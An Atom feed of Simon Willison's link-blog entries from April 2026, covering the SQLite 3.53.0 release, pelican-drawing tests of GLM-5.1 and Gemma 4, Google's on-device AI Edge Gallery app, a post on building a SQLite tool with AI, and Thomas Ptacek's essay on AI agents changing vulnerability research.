<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: Blogmarks</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/atom/links/" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-11T19:56:53+00:00</updated><author><name>Simon Willison</name></author><entry><title>SQLite 3.53.0</title><link href="https://simonwillison.net/2026/Apr/11/sqlite/#atom-blogmarks" rel="alternate"/><published>2026-04-11T19:56:53+00:00</published><updated>2026-04-11T19:56:53+00:00</updated><id>https://simonwillison.net/2026/Apr/11/sqlite/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/releaselog/3_53_0.html"&gt;SQLite 3.53.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
SQLite 3.52.0 was withdrawn so this is a pretty big release with a whole lot of accumulated user-facing and internal improvements. Some that stood out to me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ALTER TABLE&lt;/code&gt; can now add and remove &lt;code&gt;NOT NULL&lt;/code&gt; and &lt;code&gt;CHECK&lt;/code&gt; constraints - I've previously used my own &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#changing-not-null-status"&gt;sqlite-utils transform() method&lt;/a&gt; for this.&lt;/li&gt;
&lt;li&gt;New &lt;a href="https://sqlite.org/json1.html#jarrayins"&gt;json_array_insert() function&lt;/a&gt; and its &lt;code&gt;jsonb&lt;/code&gt; equivalent.&lt;/li&gt;
&lt;li&gt;Significant improvements to &lt;a href="https://sqlite.org/climode.html"&gt;CLI mode&lt;/a&gt;, including result formatting.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result formatting improvements come from a new library, the &lt;a href="https://sqlite.org/src/file/ext/qrf"&gt;Query Results Formatter&lt;/a&gt;. I &lt;a href="https://github.com/simonw/tools/pull/266"&gt;had Claude Code&lt;/a&gt; (on my phone) compile that to WebAssembly and build &lt;a href="https://tools.simonwillison.net/sqlite-qrf"&gt;this playground interface&lt;/a&gt; for trying that out.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/sqsb24/sqlite_3_53_0"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;

</summary><category term="sql"/><category term="sqlite"/></entry><entry><title>GLM-5.1: Towards Long-Horizon Tasks</title><link href="https://simonwillison.net/2026/Apr/7/glm-51/#atom-blogmarks" rel="alternate"/><published>2026-04-07T21:25:14+00:00</published><updated>2026-04-07T21:25:14+00:00</updated><id>https://simonwillison.net/2026/Apr/7/glm-51/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://z.ai/blog/glm-5.1"&gt;GLM-5.1: Towards Long-Horizon Tasks&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Chinese AI lab Z.ai's latest model is a giant 754B parameter 1.51TB (on &lt;a href="https://huggingface.co/zai-org/GLM-5.1"&gt;Hugging Face&lt;/a&gt;) MIT-licensed monster - the same size as their previous GLM-5 release, and sharing the &lt;a href="https://huggingface.co/papers/2602.15763"&gt;same paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It's available &lt;a href="https://openrouter.ai/z-ai/glm-5.1"&gt;via OpenRouter&lt;/a&gt; so I asked it to draw me a pelican:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-openrouter
llm -m openrouter/z-ai/glm-5.1 'Generate an SVG of a pelican on a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And something new happened... unprompted, the model &lt;a href="https://gist.github.com/simonw/af7170f54256cc007ef28a8721564be8"&gt;decided to give me&lt;/a&gt; an HTML page that included both the SVG and a separate set of CSS animations!&lt;/p&gt;
&lt;p&gt;The SVG was excellent, and might be my new favorite from an open weights model:&lt;/p&gt;
&lt;p&gt;&lt;img alt="The bicycle is red and has a frame the correct shape and wheels with spokes. The pelican is a perky little fella." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;But the animation &lt;a href="https://gisthost.github.io/?73bb6808b18c2482f66e5f082c75f36e"&gt;broke it&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animation - the wheels and pedals rotate, the clouds move... and the pelican has vanished, but there is a little blob bobbing up and down in the top left corner." src="https://static.simonwillison.net/static/2026/glm-5.1-broken-light-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;That's the pelican, floating up in the top left corner.&lt;/p&gt;
&lt;p&gt;I usually don't do follow-up prompts for the pelican test, but in this case I made an exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -c 'the animation is a bit broken, the pelican ends up positioned off the screen at the top right'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GLM 5.1 replied:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The issue is that CSS &lt;code&gt;transform&lt;/code&gt; animations on SVG elements override the SVG &lt;code&gt;transform&lt;/code&gt; attribute used for positioning, causing the pelican to lose its placement and fly off to the top-right. The fix is to separate positioning (SVG attribute) from animation (inner group) and use &lt;code&gt;&amp;lt;animateTransform&amp;gt;&lt;/code&gt; for SVG rotations since it handles coordinate systems correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And spat out &lt;a href="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed.html"&gt;fresh HTML&lt;/a&gt; which fixed the problem!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Now everything is right - the bicycle rotates correctly, the pelican sits on it and bobs up and down, and its lower beak moves slightly as well." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed-medium-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;I particularly like the animation of the beak, which is described in the SVG comments like so:&lt;/p&gt;
&lt;div class="highlight highlight-text-xml-svg"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;&amp;lt;!--&lt;/span&gt; Pouch (lower beak) with wobble &lt;span class="pl-c"&gt;--&amp;gt;&lt;/span&gt;&lt;/span&gt;
&amp;lt;&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M42,-58 Q43,-50 48,-42 Q55,-35 62,-38 Q70,-42 75,-60 L42,-58 Z&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;url(#pouchGrad)&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#b06008&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.9&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M48,-50 Q55,-46 60,-52&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;none&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#c06a08&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.8&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.6&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;animateTransform&lt;/span&gt; &lt;span class="pl-e"&gt;attributeName&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;transform&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;type&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;scale&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;values&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1,1; 1.03,0.97; 1,1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;dur&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.75s&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;repeatCount&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;indefinite&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;additive&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;sum&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
&amp;lt;/&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: On Bluesky &lt;a href="https://bsky.app/profile/charles.capps.me/post/3miwrn42mjc2t"&gt;@charles.capps.me suggested&lt;/a&gt; a "NORTH VIRGINIA OPOSSUM ON AN E-SCOOTER" and...&lt;/p&gt;
&lt;p&gt;&lt;img alt="This is so great. It's dark, the possum is clearly a possum, it's riding an escooter, lovely animation, tail bobbing up and down, caption says NORTH VIRGINIA OPOSSUM, CRUISING THE COMMONWEALTH SINCE DUSK - only glitch is that it occasionally blinks and the eyes fall off the face" src="https://static.simonwillison.net/static/2026/glm-possum-escooter.gif.gif" /&gt;&lt;/p&gt;
&lt;p&gt;The HTML+SVG comments on that one include &lt;code&gt;/* Earring sparkle */, &amp;lt;!-- Opossum fur gradient --&amp;gt;, &amp;lt;!-- Distant treeline silhouette - Virginia pines --&amp;gt;,  &amp;lt;!-- Front paw on handlebar --&amp;gt;&lt;/code&gt; - here's &lt;a href="https://gist.github.com/simonw/1864b89f5304eba03c3ded4697e156c4"&gt;the transcript&lt;/a&gt; and the &lt;a href="https://static.simonwillison.net/static/2026/glm-possum-escooter.html"&gt;HTML result&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/svg"&gt;svg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-in-china"&gt;ai-in-china&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/glm"&gt;glm&lt;/a&gt;&lt;/p&gt;

</summary><category term="css"/><category term="svg"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="pelican-riding-a-bicycle"/><category term="llm-release"/><category term="ai-in-china"/><category term="glm"/></entry><entry><title>Google AI Edge Gallery</title><link href="https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-blogmarks" rel="alternate"/><published>2026-04-06T05:18:26+00:00</published><updated>2026-04-06T05:18:26+00:00</updated><id>https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337"&gt;Google AI Edge Gallery&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone.&lt;/p&gt;
&lt;p&gt;It works &lt;em&gt;really&lt;/em&gt; well. The E2B model is a 2.54GB download and is both fast and genuinely useful.&lt;/p&gt;
&lt;p&gt;The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &amp;quot;Agent Skills&amp;quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &amp;quot;Show me the Castro Theatre on a map.&amp;quot; The model response, labeled &amp;quot;Model on GPU,&amp;quot; shows it &amp;quot;Called JS skill &amp;#39;interactive-map/index.html&amp;#39;&amp;quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&amp;#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &amp;quot;Open in Maps&amp;quot; link and &amp;quot;View in full screen&amp;quot; button are shown. Below the map, the model states &amp;quot;The interactive map view for the Castro Theatre has been shown.&amp;quot; with a response time of 2.4 s. A text input field with &amp;quot;Type prompt...&amp;quot; placeholder, a &amp;quot;+&amp;quot; button, and a &amp;quot;Skills&amp;quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"&gt;&lt;/p&gt;
&lt;p&gt;(That demo did freeze the app when I tried to add a follow-up prompt though.)&lt;/p&gt;
&lt;p&gt;This is the first time I've seen a local model vendor release an official app for trying out their models on in iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47652561"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/iphone"&gt;iphone&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;

</summary><category term="google"/><category term="iphone"/><category term="ai"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="gemini"/><category term="llm-tool-use"/></entry><entry><title>Eight years of wanting, three months of building with AI</title><link href="https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-blogmarks" rel="alternate"/><published>2026-04-05T23:54:18+00:00</published><updated>2026-04-05T23:54:18+00:00</updated><id>https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages.&lt;/p&gt;
&lt;p&gt;They spent eight years thinking about and then three months building &lt;a href="https://github.com/lalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt;, which they describe as "&lt;a href="https://lalitm.com/post/syntaqlite/"&gt;high-fidelity devtools that SQLite deserves&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past myself, hence my (far less production-ready) &lt;a href="https://simonwillison.net/2026/Jan/30/sqlite-ast-2/"&gt;sqlite-ast&lt;/a&gt; project from a few months ago.&lt;/p&gt;
&lt;p&gt;Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at!&lt;/p&gt;
&lt;p&gt;Claude Code helped get over that initial hump and build the first prototype:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. AI worked great for the low level details but did not produce a coherent high-level architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time.&lt;/p&gt;
&lt;p&gt;It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles.&lt;/p&gt;
&lt;p&gt;The key idea I took away from this concerns AI's weakness in terms of design and architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all.&lt;/p&gt;
&lt;p&gt;But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;

</summary><category term="sqlite"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="vibe-coding"/><category term="agentic-engineering"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-blogmarks" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;

</summary><category term="security"/><category term="thomas-ptacek"/><category term="careers"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Gemma 4: Byte for byte, the most capable open models</title><link href="https://simonwillison.net/2026/Apr/2/gemma-4/#atom-blogmarks" rel="alternate"/><published>2026-04-02T18:28:54+00:00</published><updated>2026-04-02T18:28:54+00:00</updated><id>https://simonwillison.net/2026/Apr/2/gemma-4/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/"&gt;Gemma 4: Byte for byte, the most capable open models&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts.&lt;/p&gt;
&lt;p&gt;Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now.&lt;/p&gt;
&lt;p&gt;They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I don't entirely understand that, but apparently that's what the "E" in E2B means!&lt;/p&gt;
&lt;p&gt;One particularly exciting feature of these models is that they are multi-modal beyond just images:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Vision and audio&lt;/strong&gt;: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet.&lt;/p&gt;
&lt;p&gt;I tried them out using the GGUFs for &lt;a href="https://lmstudio.ai/models/gemma-4"&gt;LM Studio&lt;/a&gt;. The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out &lt;code&gt;"---\n"&lt;/code&gt; in a loop for every prompt I tried.&lt;/p&gt;
&lt;p&gt;The succession of &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb"&gt;pelican quality&lt;/a&gt; from 2B to 4B to 26B-A4B is notable:&lt;/p&gt;
&lt;p&gt;E2B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican" src="https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;E4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it" src="https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;26B-A4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle" src="https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;(This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105"&gt;fixing that&lt;/a&gt; I got probably the best pelican I've seen yet from a model that runs on my laptop.)&lt;/p&gt;
&lt;p&gt;Google are providing API access to the two larger Gemma models via their &lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it"&gt;AI Studio&lt;/a&gt;. I added support to &lt;a href="https://github.com/simonw/llm-gemini"&gt;llm-gemini&lt;/a&gt; and then &lt;a href="https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e"&gt;ran a pelican&lt;/a&gt; through the 31B model using that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pretty good, though it is missing the front part of the bicycle frame:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. " src="https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png" /&gt;


